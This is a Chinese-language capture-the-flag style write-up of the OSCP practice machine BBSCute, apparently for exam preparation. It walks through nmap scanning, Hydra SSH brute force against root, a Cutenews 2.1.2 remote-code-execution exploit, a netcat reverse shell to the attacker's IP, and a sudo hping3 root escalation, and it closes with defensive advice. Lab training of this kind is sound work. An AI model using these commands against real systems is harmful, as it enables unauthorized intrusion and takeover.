从WEB到内网&&信息收集&&SSH爆破&&SUDO提权 ------打靶经验分享
字数 1453 2025-08-10 14:13:03
OSCP靶机渗透实战:BBSCute靶机攻防教学
靶机概述
本次实战的目标是OSCP认证考试中的BBSCute靶机,难度中等。攻击过程涉及端口探测、服务识别、SSH爆破、Web应用漏洞利用、反弹Shell建立以及SUDO提权等多个渗透测试关键环节。靶机包含两个flag:一个可通过低权限Shell获取,另一个需要提权后才能访问。
环境配置
- 攻击机IP: 192.168.45.193
- 目标靶机IP: 192.168.164.128
- VPN连接: 使用OpenVPN连接靶场网络
信息收集阶段
1. 端口扫描
使用Nmap进行全端口扫描,识别开放服务:
nmap --min-rate 10000 -p- 192.168.164.128
扫描结果:
- 22端口:SSH服务
- 80端口:HTTP服务
- 88端口:HTTP服务
- 110端口:POP3服务
- 995端口:SSL/POP3服务
2. 服务版本探测
对开放端口进行服务版本识别:
nmap -p 22,80,88,110,995 -sV 192.168.164.128
详细服务信息:
- 22端口:OpenSSH 7.9p1 Debian
- 80端口:Apache HTTP服务
- 88端口:HTTP服务
- 110端口:POP3服务
- 995端口:SSL/POP3服务
3. 端口测试
3.1 SSH服务(22端口)
检查SSH服务可利用性:
- 搜索OpenSSH 7.9p1的已知漏洞:
searchsploit openssh 7.9 msfconsole - 尝试弱口令登录:
ssh root@192.168.164.128 -p 22 - 使用Hydra进行SSH爆破:
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.164.128 ssh -s 22
3.2 HTTP服务(80端口)
Web应用测试:
- 直接访问:
curl http://192.168.164.128:80 - 目录扫描:
dirsearch -u http://192.168.164.128:80 - CMS识别:
识别结果为Cutenews CMS,版本2.1.2whatweb http://192.168.164.128/index.php
3.3 HTTP服务(88端口)
初步访问未发现可利用点,暂不深入。
攻击阶段
1. Cutenews CMS漏洞利用
识别到Cutenews 2.1.2存在已知漏洞:
searchsploit cutenews 2.1.2
发现远程代码执行漏洞(ExploitDB ID: 48800)
复制并修改漏洞利用脚本:
cp /usr/share/exploitdb/exploits/php/webapps/48800.py exp
修改脚本中的路径问题(原脚本包含"CuteNews/"路径,而目标系统直接使用index.php):
sed -i 's:CuteNews/::g' 48800.py
执行漏洞利用:
python3 48800.py
输入目标URL:http://192.168.164.128:80
成功获取初始Shell。
2. 建立稳定Shell连接
为提高交互性,建立反向Shell连接:
- 攻击机启动监听:
nc -lvvp 1234 - 目标机执行反弹Shell:
nc -e /bin/bash 192.168.45.193 1234 - 升级Shell交互性:
python -c "import pty;pty.spawn('/bin/bash')";
3. 获取第一个flag
查找并读取低权限flag:
find / -name local.txt
cat /var/www/local.txt
权限提升阶段
1. 检查sudo权限
查看当前用户的sudo权限:
sudo -l
发现hping3命令可以以root权限执行。
2. 利用hping3提权
参考GTFOBins中的hping3提权方法:
sudo hping3 --interactive
在交互模式中直接获取root shell。
3. 获取root flag
读取root目录下的flag:
cat /root/proof.txt
关键知识点总结
- 信息收集:全面的端口扫描和服务识别是渗透测试的基础
- 漏洞搜索:熟练使用searchsploit和Metasploit查找已知漏洞
- 脚本修改:能够根据目标环境调整漏洞利用脚本
- Shell稳定化:通过反向连接和pty升级改善Shell交互性
- 权限提升:利用sudo权限配置不当进行提权
- 工具使用:熟练运用Nmap、Hydra、Dirsearch、WhatWeb等工具
防御建议
- 及时更新CMS系统和插件
- 限制sudo权限,避免不必要的root权限分配
- 配置SSH服务禁止root登录和使用强密码策略
- 定期进行安全审计和漏洞扫描
- 实施最小权限原则,限制服务账户权限
通过本案例的学习,可以掌握从信息收集到权限提升的完整渗透测试流程,对准备OSCP认证考试有重要参考价值。